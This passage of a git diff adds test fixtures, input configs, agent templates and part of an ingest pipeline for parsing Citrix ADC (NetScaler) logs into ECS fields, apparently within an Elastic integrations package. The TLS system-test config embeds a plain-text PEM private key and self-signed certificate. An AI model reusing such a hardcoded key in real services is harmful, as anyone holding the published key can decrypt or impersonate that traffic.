"preserve_duplicate_custom_fields" + ], + "url": { + "domain": "some-domain.company.com" + }, + "user": { + "name": "another.email@company.com" + } + }, + { + "@timestamp": "2015-06-22T19:14:37.000Z", + "citrix": { + "cef_format": false, + "detail": "06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "device_event_class_id": "SSLVPN", + "extended": { + "message": "Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732" + }, + "facility": "local0", + "host": "ns", + "name": "ICAEND_CONNSTAT", + "priority": "info" + }, + "citrix_adc": { + "log": { + "compression_ratio_recieved": 0.0, + "compression_ratio_send": 0.0, + "connection_id": "2812c48", + "destination": { + "ip": "1.128.0.1", + "port": 444 + }, + "domain_name": "example.domain.com", + "duration": "00:00:27", + "end_time": "2022-06-14T16:18:18.000Z", + "message": "Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "source": { + "ip": "1.128.0.0", + "port": 54547 + }, + "ssl_relay": { + "address": "1.128.0.2", + "port": 2598 + }, + "start_time": "2022-06-14T16:17:51.000Z", + "total_bytes_received": 36983, + "total_bytes_send": 193250, + "total_bytes_wire_recieved": "8320800952261094732", + "total_bytes_wire_send": "8028915850309104489", + "total_compressed_bytes_recieved": 0, + "total_compressed_bytes_send": 0, + "username": "someusername" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "destination": { + "bytes": 36983, + "ip": "1.128.0.1", + "port": 444 + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "authentication" + ], + "end": "2022-06-14T16:18:18.000Z", + "id": "4471", + "original": "Jun 22 19:14:37 81.2.69.144 06/22/2015:19:14:37 GMT ns 0-PPE-1 : SSLVPN ICAEND_CONNSTAT 4471 0 : Source 1.128.0.0:54547 - Destination 1.128.0.1:444 - SSLRelayAddress 1.128.0.2:2598 - customername - username:domainname someusername:example.domain.com - startTime \"2022/06/14:16:17:51\" - endTime \"2022/06/14:16:18:18\" - Duration 00:00:27 - Total_bytes_send 193250 - Total_bytes_recv 36983 - Total_compressedbytes_send 0 - Total_compressedbytes_recv 0 - Compression_ratio_send 0.00% - Compression_ratio_recv 0.00% - connectionId 2812c48 - Total_bytes_wire_send 8028915850309104489 - Total_bytes_wire_recv 8320800952261094732", + "severity": 0, + "start": "2022-06-14T16:17:51.000Z", + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "1.128.0.0", + "1.128.0.1", + "81.2.69.144", + "1.128.0.2" + ], + "user": [ + "someusername" + ] + }, + "source": { + "as": { + "number": 1221, + "organization": { + "name": "Telstra Pty Ltd" + } + }, + "bytes": 193250, + "ip": "1.128.0.0", + "port": 54547 + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "domain": "example.domain.com", + "name": "someusername" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "device_event_class_id": "UI", + "extended": { + "message": "User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"" + }, + "facility": "local0", + "host": "ns1", + "name": "CMD_EXECUTED", + "priority": "info" + }, + "citrix_adc": { + "log": { + "adm_user": "john", + "command": "scp file.txt", + "remote_ip": "192.168.1.105", + "status": "Success", + "user": "jane.doe" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "process" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : UI CMD_EXECUTED 4471 0 : User jane.doe - ADM_User john - Remote_ip 192.168.1.105 - Command \"scp file.txt\" - Status \"Success\"", + "outcome": "success", + "severity": 0, + "timezone": "GMT", + "type": [ + "start" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "process": { + "command_line": "scp file.txt" + }, + "related": { + "ip": [ + "192.168.1.105", + "81.2.69.144" + ], + "user": [ + "jane.doe" + ] + }, + "source": { + "ip": "192.168.1.105" + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "user": { + "name": "jane.doe" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "device_event_class_id": "APPFW", + "extended": { + "message": "Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REST_VALIDATION", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "rule": "Allow", + "url": "https://service.example.org/query?id=1234" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : Rest Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "service.example.org", + "original": "https://service.example.org/query?id=1234", + "path": "/query", + "query": "id=1234", + "scheme": "https" + } + }, + { + "@timestamp": "2014-10-06T14:03:23.000Z", + "citrix": { + "cef_format": false, + "detail": "10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "device_event_class_id": "APPFW", + "extended": { + "message": "gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234" + }, + "facility": "local0", + "host": "ns1", + "name": "APPFW_REST_VALIDATION", + "priority": "info" + }, + "citrix_adc": { + "log": { + "message": "gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "rule": "Allow", + "url": "https://service.example.org/query?id=1234" + } + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.144" + }, + "ecs": { + "version": "8.12.0" + }, + "event": { + "category": [ + "network" + ], + "id": "4471", + "original": "Oct 6 14:03:23 81.2.69.144 10/06/2014:14:03:23 GMT ns1 0-PPE-0 : APPFW APPFW_REST_VALIDATION 4471 0 : gRPC Validation relaxation rule: Allow hit at url: https://service.example.org/query?id=1234", + "severity": 0, + "timezone": "GMT", + "type": [ + "info" + ] + }, + "observer": { + "product": "Netscaler", + "type": "firewall", + "vendor": "Citrix" + }, + "related": { + "ip": [ + "81.2.69.144" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "url": { + "domain": "service.example.org", + "original": "https://service.example.org/query?id=1234", + "path": "/query", + "query": "id=1234", + "scheme": "https" + } + } + ] +} \ No newline at end of file diff --git a/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml new file mode 100644 index 00000000000..1587dd9215d --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-logfile-config.yml @@ -0,0 +1,7 @@ +service: citrix-adc-logfile +input: logfile +data_stream: + vars: + paths: + - "{{SERVICE_LOGS_DIR}}/*.log" + preserve_original_event: true diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml new file mode 100644 index 00000000000..ae4b6864d46 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tcp-config.yml @@ -0,0 +1,8 @@ +service: citrix-adc-tcp +service_notify_signal: SIGHUP +input: tcp +data_stream: + vars: + listen_address: 0.0.0.0 + listen_port: 9560 + preserve_original_event: true diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml new file mode 100644 index 00000000000..469f6623e21 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-tls-config.yml @@ -0,0 +1,60 @@ +service: citrix-adc-tls +service_notify_signal: SIGHUP +input: tcp +data_stream: + vars: + listen_address: 0.0.0.0 + listen_port: 9561 + preserve_original_event: true + ssl: | + key: | + -----BEGIN PRIVATE KEY----- + MIIEvwIBADANBgkqhkiG9w0BAQEFAASCBKkwggSlAgEAAoIBAQDhCLvLsQAHufsN + U+u1x/CequAUphfXZqLhDo2Eo/holfBS0+ey4bnzPL6lS9NFL5JkLQA2gYESqsXU + /Ru8E76Az1egzMwT3TVAPLVU8NbrxBqeNiQa2m9wC37HQy4qC9OxL28LUoKtFjxS + cD1sa0oikXCJN1a3BSoAf9iiZ/dxz4WVfrNhrzq2JFXjravY84n5ujkZOg45Pg70 + 4vHOeg0rBbIoSNfjDUVZWjwC95K1BMN3msOTL9juv/EDa6BujqCxl+G1nY7JPFDL + SHWis65p+1AAa5xieYDb47vyJ0SSR7lEURTXZOkkM6k5JWfgkATEmGzRxPkOloIT + Xg9ag1OlAgMBAAECggEAEHfPJmzhj68wjB0kFr13AmWG2Hv/Kqg8KzQhbx+AwkaW + u7j+L70NGpvLZ9VQtLNyhxoz9cksZO1SZO/Q48aeHlcOFppmJN3/U6AdtQWa9M35 + FLLpmX16wjxVHsfvzOvopgLOoYl8PqZt66qDFDgVyMnT7na6RdJ+7GJuvBPXq+Bc + vgThvAZitHSAOhnBFYmTMlBi6AzOMMsaFlgE3Xf9v3M0pAKItPRKMhXlC3MyvA/v + jgbra4Ib+0ryohggHheHB3bn3Jgv7iFKoW9OQSePVxacJ+kfr9H+No5g495URzqR + mx/96WCiv3rAh3ct8Sk/C4/3zMC8fUueDJIVjhgw0QKBgQD8NufLINNkIpBrLoCS + 972oFEjZB2u6EusQ7X9raROqpaw26ZSu+zSHeIKCGQ93M3aRb3FpdGeOxgZ095MV + 8a+nlh4stOvHj2Mm5YhTBDUavTC7o9aVR3Od5eTXUpHnaJpNI/uyIcKupeK1UJnV + UlBLeIwo/vJ1gsVrKMMAJkuKbwKBgQDkaWRRd0w2gUIbCTGf203BqXft0VdIiOW7 + +gnkeaNHAf09XljzxMcQzrB8kG63aKVGbJffphEfzxtiJ+HRQVH+7QpKRhU/GHmu + +6OKkxTcxJm5zhoRFxcSi2wG4PWmUGJvc7ss1OJGcaOUxwocCepO7N/jfdDz9Uke + KnA+YWOdKwKBgQDteZkYlojT0QOgF8HyH5gQyUCqMKWLJ0LzxltiPCbLV4Dml1pq + w5Z7M8nWS1hXiTpLx93GSFc1hFkSCwYP9GfK6Lryp0sVtHnMZvTMDbseuSJImwRx + vDwtYQfugg1lEQWwOoBEAiu3m/PxernNtNprpU57T0nlwUK3GkM5QdWAuwKBgQCZ + ZF3GiANapzupxGbbH//8Cr9LqsafI7CEqMpz8WxBh4h16iJ6sq+tDeFgBe8UpOY5 + gTwNKg1d+0w8guQYD3HtbWr3rlEeamVtqfiOW3ArQqyqJ0tCJuuLvK3zgKf35Qv2 + JRaSaPT8sdxVUcXsRoxgLJu+vwPQke1koMN4YRbwuQKBgQDJiZ/WSeqa5oIqkXbn + hjm7RXKaf2oE1U/bNjdSFtdEP7T4vUvvr7Hq2f/jiBLtCE7w16PJjKx9iIq2+jMl + qIY43Sk9bdi5FxtYTHda0hwrbH274P+QVcVs5PXCT0TGktOleHGBlXaaPrxl9iCh + 8tmmxZZYa5aQxEO/lxB9xQKaiQ== + -----END PRIVATE KEY----- + certificate: | + -----BEGIN CERTIFICATE----- + MIIDazCCAlOgAwIBAgIUW5TDu1tJMY2Oa7PsL+BQSmeWqz0wDQYJKoZIhvcNAQEL + BQAwRTELMAkGA1UEBhMCVVMxEzARBgNVBAgMClNvbWUtU3RhdGUxITAfBgNVBAoM + GEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDAeFw0yMTEwMDEwNTAwMjNaFw0yMTEw + MDIwNTAwMjNaMEUxCzAJBgNVBAYTAlVTMRMwEQYDVQQIDApTb21lLVN0YXRlMSEw + HwYDVQQKDBhJbnRlcm5ldCBXaWRnaXRzIFB0eSBMdGQwggEiMA0GCSqGSIb3DQEB + AQUAA4IBDwAwggEKAoIBAQDhCLvLsQAHufsNU+u1x/CequAUphfXZqLhDo2Eo/ho + lfBS0+ey4bnzPL6lS9NFL5JkLQA2gYESqsXU/Ru8E76Az1egzMwT3TVAPLVU8Nbr + xBqeNiQa2m9wC37HQy4qC9OxL28LUoKtFjxScD1sa0oikXCJN1a3BSoAf9iiZ/dx + z4WVfrNhrzq2JFXjravY84n5ujkZOg45Pg704vHOeg0rBbIoSNfjDUVZWjwC95K1 + BMN3msOTL9juv/EDa6BujqCxl+G1nY7JPFDLSHWis65p+1AAa5xieYDb47vyJ0SS + R7lEURTXZOkkM6k5JWfgkATEmGzRxPkOloITXg9ag1OlAgMBAAGjUzBRMB0GA1Ud + DgQWBBRYUSKDHBBE9Q6fTeTqogicCxcXwDAfBgNVHSMEGDAWgBRYUSKDHBBE9Q6f + TeTqogicCxcXwDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBc + T8B+GpvPy9NQ700LsywRPY0L9IJCKiu6j3TP1tqqSPjAC/cg9ac+bFXuWOu7V+KJ + s09Q/pItq9SLX6UvnfRzTxu5lCBwwGX9cL131mTIu5SmFo7Eks+sorbiIarWDMoC + e+9An3GFpagW+YhOt4BdIM5lTqoeodzganDBsOUZI9aDAj2Yo5h2O7r6Wd12cb6T + mz8vMfB2eG8BxU20ZMfkdERWjiyXHOSBQqeqfkV8d9370gMu5RcJNcIgnbmTRdho + X3HJFiimZVaNjXATqmC/y2A1KXvJdamPLy3mGXkW2cFLoPCdK2OZFUHqiuc1bigA + qEf55SihFqErRMeURPPF + -----END CERTIFICATE----- diff --git a/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml b/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml new file mode 100644 index 00000000000..7d2de584d02 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/_dev/test/system/test-udp-config.yml @@ -0,0 +1,8 @@ +service: citrix-adc-udp +service_notify_signal: SIGHUP +input: udp +data_stream: + vars: + listen_address: 0.0.0.0 + listen_port: 9560 + preserve_original_event: true diff --git a/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs new file mode 100644 index 00000000000..9d63bee11f5 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/agent/stream/stream.yml.hbs @@ -0,0 +1,29 @@ +paths: +{{#each paths as |path|}} + - {{path}} +{{/each}} +exclude_files: [".gz$"] +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +processors: +- add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} +{{/if}} diff --git a/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs new file mode 100644 index 00000000000..0e3d7517cb5 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/agent/stream/tcp.yml.hbs @@ -0,0 +1,31 @@ +host: "{{listen_address}}:{{listen_port}}" +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +{{#if ssl}} +ssl: {{ssl}} +{{/if}} +processors: +- add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} +{{#if tcp_options}} +{{tcp_options}} +{{/if}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} +{{/if}} diff --git a/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs b/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs new file mode 100644 index 00000000000..307fbc95502 --- /dev/null +++ b/packages/citrix_adc/data_stream/log/agent/stream/udp.yml.hbs @@ -0,0 +1,28 @@ +host: "{{listen_address}}:{{listen_port}}" +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + - preserve_duplicate_custom_fields +{{/if}} +{{#each tags as |tag|}} + - {{tag}} +{{/each}} +{{#contains "forwarded" tags}} +publisher_pipeline.disable_host: true +{{/contains}} +processors: +- add_locale: ~ +{{#if processors}} +{{processors}} +{{/if}} +{{#if udp_options}} +{{udp_options}} +{{/if}} +{{#if tz_offset}} +fields_under_root: true +fields: + _conf: + tz_offset: {{tz_offset}} +{{/if}} diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml new file mode 100644 index 00000000000..a658fc9a77d --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/alg_feature.yml @@ -0,0 +1,186 @@ +--- +description: Pipeline for Citrix Native messages of ALG feature. +processors: + - grok: + description: Extract fields from message of ALG feature. + tag: grok_alg_feature + field: citrix.extended.message + patterns: + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Error%{SPACE}:%{SPACE}\"%{DATA:citrix_adc.log.error}\" - Error_line%{SPACE}:%{SPACE}\"%{DATA:citrix_adc.log.error_line}\" - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name} -$' + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name}$' + - '^Errmsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.errmsg}\" - Error_Code%{SPACE}:%{SPACE}%{INT:citrix_adc.log.error_code} - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group}$' + - '^Infomsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.infomsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Session_ID%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.session_id} -$' + - '^Infomsg%{SPACE}:%{SPACE}\"%{GREEDYDATA:citrix_adc.log.infomsg}\" - Group%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.group} - Call_ID%{SPACE}:%{SPACE}%{NOTSPACE:citrix_adc.log.call_id} - Transport%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.transport} - Source_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.source.ip} - Source_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.source.port} - Destination_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.destination.ip} - Destination_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.destination.port} - Natted_IP%{SPACE}:%{SPACE}%{IP:citrix_adc.log.natted.ip} - Natted_port%{SPACE}:%{SPACE}%{INT:citrix_adc.log.natted.port} - Method%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.method} - Sequence_Number%{SPACE}:%{SPACE}%{INT:citrix_adc.log.sequence_number} - Register%{SPACE}:%{SPACE}%{WORD:citrix_adc.log.register} - Content_Type%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.content_type} - Caller_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.caller.user_name} - Callee_user_name%{SPACE}:%{SPACE}%{USER:citrix_adc.log.callee.user_name} - Caller_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.caller.domain_name} - Callee_domain_name%{SPACE}:%{SPACE}%{DATA:citrix_adc.log.callee.domain_name} -$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.natted.ip + tag: convert_natted_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.natted?.ip != null && ctx.citrix_adc.log.natted.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.nat.ip + tag: set_destination_nat_ip_from_natted_ip + copy_from: citrix_adc.log.natted.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.natted.port + tag: convert_natted_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.nat.port + tag: set_destination_nat_port_from_natted_port + copy_from: citrix_adc.log.natted.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.port + tag: convert_destination_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: destination.port + tag: set_destination_port_from_destination_port + copy_from: citrix_adc.log.destination.port + ignore_empty_value: true + - set: + field: destination.user.domain + tag: set_destination_user_domain_from_callee_domain_name + copy_from: citrix_adc.log.callee.domain_name + ignore_empty_value: true + - set: + field: destination.user.name + tag: set_destination_user_name_from_callee_user_name + copy_from: citrix_adc.log.callee.user_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.error_code + tag: convert_error_code_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: error.code + tag: set_error_code_from_error_code + copy_from: citrix_adc.log.error_code + ignore_empty_value: true + - set: + field: error.message + tag: set_error_message_from_errmsg + copy_from: citrix_adc.log.errmsg + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_group + copy_from: citrix_adc.log.group + ignore_empty_value: true + - set: + field: http.request.method + tag: set_http_request_method_from_method + copy_from: citrix_adc.log.method + ignore_empty_value: true + - set: + field: message + tag: set_message_from_infomsg + copy_from: citrix_adc.log.infomsg + ignore_empty_value: true + - set: + field: network.transport + tag: set_network_transport_from_transport + copy_from: citrix_adc.log.transport + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: 